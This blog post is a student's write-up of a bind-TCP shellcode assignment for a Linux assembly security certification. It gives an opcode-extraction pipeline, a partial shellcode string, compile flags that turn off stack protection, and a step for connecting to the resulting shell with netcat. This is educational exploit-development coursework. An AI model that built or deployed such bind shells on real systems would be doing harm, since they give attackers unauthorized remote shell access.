SLAE Assignment #1 – Shell_Bind_TCP Shellcode

Files available on GitHub

  1. Assignment1.nasm
  4. shellcode.c

In this assignment, I created a socketcall() in assembly and redirected STDIN, STDOUT, and STDERR to it.  Using some cut and trim magic learned via commandlinefu, the opcodes were pasted into the program, which the user executes with an argument to specify the port used.  That output is put into the shellcode.c skeleton program which is compiled without stack protection and allowing stack execution.

Here’s the trim command to extract the opcodes:

objdump -d ./shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Step 1:  Compile assignment1.nasm

Step 2:  Extract the opcodes

Run -p <port number of choice>

./ -p 1337
Shellcode : "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1

Insert that output into code[] variable of the skeleton C program.

Compile with:

gcc -fno-stack-protector -z execstack shellcode.c 
-o shellcode

Run, and connect from another terminal with netcat on the port you specified using and you’re in!


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID:  SLAE-860

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s